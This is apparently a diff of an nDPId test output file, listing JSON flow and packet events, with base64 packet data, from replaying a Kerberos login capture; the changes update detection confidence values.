00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716140476,"flow_last_seen":946716140476,"flow_idle_time":200000,"flow_min_l4_payload_len":1235,"flow_max_l4_payload_len":1235,"flow_tot_l4_payload_len":1235,"flow_avg_l4_payload_len":1235,"midstream":0,"thread_ts_msec":946716140476,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1092,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02113{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":946716140476,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1277,"pkt_l4_len":1243,"thread_ts_msec":946716140476,"pkt":"AAP\/pqsMAAP\/p6sMCABFAATvAhgAAIAREN4KAQwCCgUDAQREAFgE2zRybIIEzzCCBMuhAwIBBaIDAgEMo4IEMzCCBC8wggQroQMCAQGiggQiBIIEHm6CBBowggQWoAMCAQWhAwIBDqIHAwUAAAAAAKOCA3NhggNvMIIDa6ADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMzMIIDL6ADAgEXoQMCAQKiggMhBIIDHcAYVO+Q2IXUSYyHjuVHfKxUHYGW7TjhCP7ht14YomVNNTmVhUnNVAEemRFIQsjfyH7Id6NfOJsQ1ejL1lbQdxG+gxX6ALA\/MK9eCjPeeH1HN\/61cBhJfEoqY2F\/mKeHRuCggrFXQbZxlsXVGLtZu4PWih8KNf7sWfI01ih\/KOVOFbC+DQgRsewUOZidaGbk8YDAWfLTeW1icWpEgz\/\/XQZftiBtg72zgDTGa\/mE6hUu8t57cVSOGEQlF1ZQKVTTZOn9zHhQisTijr021JJttOf7qpJ5+uomVPYE8lx0pL85ESuIwtqHGJcBMVlPS1H8MreebQzjvMWuoHQUc\/OGtz6S3YhFyDPaOH1iZQXjznPs\/MyXoX\/WPWeAVNxUiY9FXqN8Ysyj493ju1vpN6nhvsrEoaZdGaTppTmaoJXuyc1CSns2LWWlo8V5W5bAI5ei3AXjL1oeF7Et2GbqYgAGntju2FLJBhD\/4R9ROO1oMGYhSCMMKYRZ9+nR1+RMN\/cuq64EBBvfHy6tayyRjsACSMzeD4dT5O1By9VoDbf\/l3TiOVyUpKN6HtnGTLks0PEgzGhBo12SoVAT914LxU8URDkKFF0IvIDKHRP2PfXNHrTqwCKivWiNW4Y4msxofW+KFzIutb67iawdaddMq1dxg27Qc6okQGPjpdNfDl7H1FT8XYGvgXsggcVItUDBSFzgmIrorZjg1UIv0N65LTCbyuSoTSRNZLyNRs5IjZa6b6aNmzfJeURuRlXpFmy55SswzPpOVIbpqN9UjrKoARvOdTXIy7zAlLTf79OOzEiGttGb1lQL8qGp6NvmbBOCY3s1pqh3u0pNR2XX5Z1LkgF8exqSVZL2UsbFy1H87cEdwhSaPgKai6SsQvAamU+n99gLhejxN3\/mg\/VFw+wucn7jxY5D9SmJGaVA97YjoZZdGLogQ15cOtgSBPsYJESl4I46m0Z6YgTQJDNcPvLgJDlNJtTGXZLJ9sOGxpwEknEXtocEjmZZBksfp4wtv7t34FGLYzt1idyslHkz+eOdJAgfnLj7Zmp43EncB0hi68U9pIGJMIGGoAMCAReifwR9yfyxOO1tDXfkA21swax5sbcMOPHtz7FOWAJjttySYh9q\/U6+DaiPCkQdJZimVz4\/paJ2BxXfqBHjHe9cI0tG8FS08MzW1ar6H9PqA6Jjo6qK8PWdlaX14V6ahvbqdGHCzINrk4h0zH1k1RbjMVXvPB54LZXwfThm6YvXS8KkgYcwgYSgBwMFAECAAACiDBsKREVOWURDLkNPTaM1MDOgAwIBAqEsMCobBGxkYXAbFnZwYy13MmszZW50LmRlbnlEQy5jb20bCmRlbnlEQy5jb22lERgPMjAzNzA5MTMwMjQ4MDVapwYCBDXdepyoGTAXAgEXAgL\/ewIBgAIBAwIBAQIBGAIC\/3k="} -00709{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716140476,"flow_last_seen":946716140476,"flow_idle_time":200000,"flow_min_l4_payload_len":1235,"flow_max_l4_payload_len":1235,"flow_tot_l4_payload_len":1235,"flow_avg_l4_payload_len":1235,"midstream":0,"thread_ts_msec":946716140476,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1092,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} +00709{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716140476,"flow_last_seen":946716140476,"flow_idle_time":200000,"flow_min_l4_payload_len":1235,"flow_max_l4_payload_len":1235,"flow_tot_l4_payload_len":1235,"flow_avg_l4_payload_len":1235,"midstream":0,"thread_ts_msec":946716140476,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1092,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 02109{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":946716140476,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1270,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1270,"pkt_l4_len":1236,"thread_ts_msec":946716140476,"pkt":"AAP\/p6sMAAP\/pqsMCABFAAToStAAAIARyCwKBQMBCgEMAgBYBEQE1LNjbYIEyDCCBMSgAwIBBaEDAgENowwbCkRFTllEQy5DT02kDzANoAMCAQGhBjAEGwJ1NaWCA4lhggOFMIIDgaADAgEFoQwbCkRFTllEQy5DT02iNTAzoAMCAQKhLDAqGwRsZGFwGxZ2cGMtdzJrM2VudC5kZW55REMuY29tGwpkZW55REMuY29to4IDMzCCAy+gAwIBF6EDAgEJooIDIQSCAx1XI1556E9z8BiUgjJbUldMqjiyjAOxJ74uvYMLDwxmOkONdxBzTP1MSutRBBJQTWWXJYnyPMWu\/zI3K8hgoj0GmO\/W8w5vOr10lKcN1HyFNXzfCcmd+XgtMHJyD9BpjeNQ1qJ7oPMb+3WHTRYAFu8twMOmamcEqk6jWl+RywUCXjB9QNUKbwcPH\/JoF+zgvjfdfQ2OGDZa6PRJfaZGOL3Bz+FIbH9C2Fx\/I0nE4oaZcxNFRtxYJUyvG9vShCS\/R5MP0kJ2mnUJANBpE\/Vhz++ZSyLN6pNHd\/BEJAUsjGylkuTxzl2Lnq6PkkBTlHz+pgv6hR\/FyMk7kXPcVY6PpFUDiTSVJNw7s++K9VnOE6XjGs8CiEERYB+LMPU0ncEA55LXWZNmAVu1KOAGMj17PTgVLoL6gcSspNormMp\/nfk9k7yWeMj9WVgNKNXSes\/iL2g6dE8UXWlxn0w0DA41fhjG98Ub5akpglBCfge1kIIGd7awaZFdsAGhJH2reytyG4e4AahbQRH8St4p8iuP5pTlvGPcTIF90Lk1zalSH6f+3t2i+KQ3rrJRWlqIFMxL0W6xWXWN2A69OpkDW7SJZqdqxhUDrJHBEZqo7\/kr1rPXjk3tEZUZ+\/3jYgOnA6KoV+FvCed0t8bykcaXzgJB3JixzvMvrL0YUkrgDYHyGlolZi0zI2+6D6YaI9ANLUPJhNyzYBA93Yfsl3o6ZSj0mmgiZq\/lVbEpMl51Vc+fIXypt8EHCM6glksV3GB+sT+9kvU5YmZf4p35ih5qs+B6wxDScYCHnxUQ5M7Y+CaB+Z8umyuJFuExqyhaLvsHxSu7C5RR9zkRoXRxlMlSUlioW\/k\/f2t8OixHzUGA4Pjlkvsn7oU9bY5CEFkvEOMd9OAWhdmwZX2trUJgB9kuTMLfC08vIm25jVGyjrOMvrfllYb9Tkon9cDFzySBqwpdy3mzAFDGbSbgSSVph9mJQQwd5HbHKinSVH6cIBJewcN67UlHl60gcsB648MqUc5y3yNg\/aT2LJRlx4Hugf4703fBz1ilFKkTyia5hLwY0ditm6aCAQowggEGoAMCAReigf4Egfs6rVBU5Wbf58UJI1nlKrW\/LPMlXp44cwupSkh1AXVr0jMWvkg\/cKqEOLVh+eLdXMJf\/7tuabmMyWEcrpHyGjV8QdU\/LRfiYvKiLliUQZc2ab4RQLJpbpbJm162ZbTsK8MoJ0nxxcKChBmo7b0Cn4N95XSQaG\/mILea4u+9\/df1RJfKa1Rm6tTGG5JYZqb2yXuujbwC30Zt17c1Hi\/vUkA9vpV1e6xV2EIpzTM7qHDcAeZWNHGOA4MUdtxQCXzJDDEFf9vqk1T481Q3FdEgo63vG0rmeUX8x9LMl7OmGOelI0Hkx4m0lCbreYKTnpzNK53E2WNaqEIapwkuaQ=="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716140774,"flow_last_seen":946716140774,"flow_idle_time":200000,"flow_min_l4_payload_len":1221,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":1221,"flow_avg_l4_payload_len":1221,"midstream":0,"thread_ts_msec":946716140774,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1096,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02090{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":946716140774,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1263,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1263,"pkt_l4_len":1229,"thread_ts_msec":946716140774,"pkt":"AAP\/pqsMAAP\/p6sMCABFAAThAjoAAIAREMoKAQwCCgUDAQRIAFgEzRTGbIIEwTCCBL2hAwIBBaIDAgEMo4IEMzCCBC8wggQroQMCAQGiggQiBIIEHm6CBBowggQWoAMCAQWhAwIBDqIHAwUAAAAAAKOCA3NhggNvMIIDa6ADAgEFoQwbCkRFTllEQy5DT02iHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkRFTllEQy5DT02jggMzMIIDL6ADAgEXoQMCAQKiggMhBIIDHcAYVO+Q2IXUSYyHjuVHfKxUHYGW7TjhCP7ht14YomVNNTmVhUnNVAEemRFIQsjfyH7Id6NfOJsQ1ejL1lbQdxG+gxX6ALA\/MK9eCjPeeH1HN\/61cBhJfEoqY2F\/mKeHRuCggrFXQbZxlsXVGLtZu4PWih8KNf7sWfI01ih\/KOVOFbC+DQgRsewUOZidaGbk8YDAWfLTeW1icWpEgz\/\/XQZftiBtg72zgDTGa\/mE6hUu8t57cVSOGEQlF1ZQKVTTZOn9zHhQisTijr021JJttOf7qpJ5+uomVPYE8lx0pL85ESuIwtqHGJcBMVlPS1H8MreebQzjvMWuoHQUc\/OGtz6S3YhFyDPaOH1iZQXjznPs\/MyXoX\/WPWeAVNxUiY9FXqN8Ysyj493ju1vpN6nhvsrEoaZdGaTppTmaoJXuyc1CSns2LWWlo8V5W5bAI5ei3AXjL1oeF7Et2GbqYgAGntju2FLJBhD\/4R9ROO1oMGYhSCMMKYRZ9+nR1+RMN\/cuq64EBBvfHy6tayyRjsACSMzeD4dT5O1By9VoDbf\/l3TiOVyUpKN6HtnGTLks0PEgzGhBo12SoVAT914LxU8URDkKFF0IvIDKHRP2PfXNHrTqwCKivWiNW4Y4msxofW+KFzIutb67iawdaddMq1dxg27Qc6okQGPjpdNfDl7H1FT8XYGvgXsggcVItUDBSFzgmIrorZjg1UIv0N65LTCbyuSoTSRNZLyNRs5IjZa6b6aNmzfJeURuRlXpFmy55SswzPpOVIbpqN9UjrKoARvOdTXIy7zAlLTf79OOzEiGttGb1lQL8qGp6NvmbBOCY3s1pqh3u0pNR2XX5Z1LkgF8exqSVZL2UsbFy1H87cEdwhSaPgKai6SsQvAamU+n99gLhejxN3\/mg\/VFw+wucn7jxY5D9SmJGaVA97YjoZZdGLogQ15cOtgSBPsYJESl4I46m0Z6YgTQJDNcPvLgJDlNJtTGXZLJ9sOGxpwEknEXtocEjmZZBksfp4wtv7t34FGLYzt1idyslHkz+eOdJAgfnLj7Zmp43EncB0hi68U9pIGJMIGGoAMCAReifwR9EeZm1xXCGjpTcLGRq4WuQ8ssviUxl213ypmulixTQWFmAQi1gq8M3vB7vTp7SGKt8sIF14iqGTiJJWz+TgAufWTJ4n2ibf9kuYyLGTZfXqU+XTn7oSwP6CplUyx8Rcx6fjORhXuzJFTp0WjwfJC+Z3aW5oAvEH9BL5cNtHmkejB4oAcDBQBAgAAAogwbCkRFTllEQy5DT02jKTAnoAMCAQKhIDAeGwRjaWZzGxZ2cGMtdzJrM2VudC5kZW55ZGMuY29tpREYDzIwMzcwOTEzMDI0ODA1WqcGAgQ1jymRqBkwFwIBFwIC\/3sCAYACAQMCAQECARgCAv95"} -00709{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716140774,"flow_last_seen":946716140774,"flow_idle_time":200000,"flow_min_l4_payload_len":1221,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":1221,"flow_avg_l4_payload_len":1221,"midstream":0,"thread_ts_msec":946716140774,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1096,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} +00709{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946716140774,"flow_last_seen":946716140774,"flow_idle_time":200000,"flow_min_l4_payload_len":1221,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":1221,"flow_avg_l4_payload_len":1221,"midstream":0,"thread_ts_msec":946716140774,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1096,"dst_port":88,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"denydc.com","username":""}} 02065{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":946716140774,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1244,"pkt_l4_len":1210,"thread_ts_msec":946716140774,"pkt":"AAP\/p6sMAAP\/pqsMCABFAATOSu8AAIARyCcKBQMBCgEMAgBYBEgEurmkbYIErjCCBKqgAwIBBaEDAgENowwbCkRFTllEQy5DT02kDzANoAMCAQGhBjAEGwJ1NaWCA31hggN5MIIDdaADAgEFoQwbCkRFTllEQy5DT02iKTAnoAMCAQKhIDAeGwRjaWZzGxZ2cGMtdzJrM2VudC5kZW55ZGMuY29to4IDMzCCAy+gAwIBF6EDAgEJooIDIQSCAx0aFmxok9g1Ue0357Hr75qdhqZfRht4OHreKB5u\/V5IirkcwENplNxxQmbw8+DFBp6kUxON4ouXLUpsGQja+UwQNswQ7cEXb3TTT7jYMm2q+XU9A8z+Cm+x45x6EPfupXNfUoIz5d+DBXqnAKwiMsohJZBYGmEm7Q+yhVWVar9k\/vQ4EHxPSmoKKOWOqMeWxjcfGizeQcfY\/7A7oBkliScCXMBosF3zWgVn6SZUxx2nLdkS4jVlNmS1jWY0CBy3hQgCl7KtJ88Rxj2JXMQ5Fa0ibQHlt+FeHBgOikUOCt7JR9KHGnKF+V9OwmxFHJrtiKrEW2Cv72q08\/TX55bwUm9jrgvLF+1YsovMtrgWOHLFsVcxNfbdawsk1MAGXI1K8WdNlNxj79Sa+effGMmTt32eF8\/oOYgeR3A+0F1wnFjIQeheNTRLl\/9WBWymTf5CVGZk9I\/sUh0ufZ1o58VaghVEb+aOBC6tWfpsOkLJ9ANhxY1Vw45ioZzS06CBZRvW7MMUcb4Ur7IeznoOXOKL+obkIkaEuJF9dxjVVEK3H8T8BFen6GrrRV4+9gxQ28wWj2B\/3R0I0K8npdyxugyU7o6q1h547H+5tjJ8dixUeIFR0R+BxQUA1qGlVkB7SS4zvQUHJeQ33GsZmfB09OjxsbZUKDOYPS2DppWChX3zAiJESMybgCQW5ulCO\/DCKGrcKFEaqcfqvdr1e4WyRdwCcvZn2MJR1nu01uw1EbqNmvBlDTHXDpZmQAS+Z9AFAEe6+Jwucjc+X3W9+cKSxj+uTpUbPMfAp3MPTCh88MxPw2Aax6SFtx5IK+P6jE2F6eQfjhX9aV6hdIZ0pWVxFUqJk1oXwgJHigW8nhTnJsDeLgqs70DVvtJOOt9wQIyuysdS5eh4ZJK2TyKfSg9XuEekXtqV8HHagG6OZO87HJsGQmu\/\/tjHaE7Ql4hIoe+fcxYBzuwcDJYmBr6xlBxFqKXZZHTBFk60GqPFITFaX17Oz+6fJYP3RmN2JGKt17gwAhua9IJr3+oyzOLK9Ar9ryp7P5t03iErc\/1gvMC+WI+39aaB\/TCB+qADAgEXooHyBIHv9+WbNZuFKxvCR6wr2zaCGnigV6GBLntoGkqEg4\/vMLz6p+qzEJQC2ilW82BTzXU6scdi61TaIC3oq6sMVee5Q+SNihDQg2j\/e7P09S+lWbe2hxhDb2MYsqe8Lg50XMclkXvYxZYVxgGfh9+QhSOku3gyZ4w550hPMwNPtwT50N8oSP0YzMlcdyjS0yGxX38Sztfi6maarSaN8R8bO1fNlv7DMT0XFldAA9Ujo2zbz4RI5ls2TDkFYA60ukMDSLX5c+pTDKFVkARApYRvSaMnKg1aCCWfstO5zat+wIz45gQKBeA3dPJACT5hwG+Q1qc="} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":25,"source":"kerberos-login.pcap","alias":"nDPId-test","packets-captured":25,"packets-processed":24,"total-skipped-flows":0,"total-l4-payload-len":29024,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":0,"current-active-flows":12,"total-active-flows":12,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":51,"global_ts_msec":946724453221} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946724453221,"flow_last_seen":946724453221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946724453221,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":946724453221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"GGbam+N9uKxvNgTjCABFAAA88adAAEAGs7TAqAoMwKgKA6zgAFj7lQiGAAAAAKACchCWGgAAAgQFtAQCCAr\/\/vkhAAAAAAEDAwc="} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":946724453221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"uKxvNgTjGGbam+N9CABFAAA8DbNAAIAGV6nAqAoDwKgKDABYrOCOu9eK+5UIh6ASIAAObgAAAgQFtAEDAwgEAggKM1tACf\/++SE="} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":946724453221,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":946724453221,"pkt":"GGbam+N9uKxvNgTjCABFAAA88adAAEAGs7TAqAoMwKgKA6zgAFj7lQiGAAAAAKACchCWGgAAAgQFtAQCCAr\/\/vkhAAAAAAEDAwc="} -00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":946724453221,"flow_last_seen":946724453221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":1555,"flow_avg_l4_payload_len":222,"midstream":0,"thread_ts_msec":946724453221,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"testbed1.ca","username":""}} -00734{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":35,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":946724453221,"flow_last_seen":946724453222,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":4664,"flow_avg_l4_payload_len":424,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"testbed1.ca","username":"ubuntu64a"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716066779,"flow_last_seen":946716066779,"flow_idle_time":200000,"flow_min_l4_payload_len":1189,"flow_max_l4_payload_len":1211,"flow_tot_l4_payload_len":2400,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1061,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067396,"flow_last_seen":946716067396,"flow_idle_time":200000,"flow_min_l4_payload_len":1192,"flow_max_l4_payload_len":1223,"flow_tot_l4_payload_len":2415,"flow_avg_l4_payload_len":1207,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1065,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067473,"flow_last_seen":946716067513,"flow_idle_time":200000,"flow_min_l4_payload_len":1205,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":1212,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1067,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067526,"flow_last_seen":946716067526,"flow_idle_time":200000,"flow_min_l4_payload_len":1187,"flow_max_l4_payload_len":1209,"flow_tot_l4_payload_len":2396,"flow_avg_l4_payload_len":1198,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1068,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716067819,"flow_last_seen":946716067819,"flow_idle_time":200000,"flow_min_l4_payload_len":1186,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":2394,"flow_avg_l4_payload_len":1197,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1069,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716089644,"flow_last_seen":946716089644,"flow_idle_time":200000,"flow_min_l4_payload_len":1233,"flow_max_l4_payload_len":1237,"flow_tot_l4_payload_len":2470,"flow_avg_l4_payload_len":1235,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1074,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716089757,"flow_last_seen":946716089757,"flow_idle_time":200000,"flow_min_l4_payload_len":1205,"flow_max_l4_payload_len":1219,"flow_tot_l4_payload_len":2424,"flow_avg_l4_payload_len":1212,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1076,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716138858,"flow_last_seen":946716138858,"flow_idle_time":200000,"flow_min_l4_payload_len":1186,"flow_max_l4_payload_len":1213,"flow_tot_l4_payload_len":2399,"flow_avg_l4_payload_len":1199,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1084,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946716139910,"flow_last_seen":946716139910,"flow_idle_time":200000,"flow_min_l4_payload_len":1202,"flow_max_l4_payload_len":1221,"flow_tot_l4_payload_len":2423,"flow_avg_l4_payload_len":1211,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"10.1.12.2","dst_ip":"10.5.3.1","src_port":1089,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 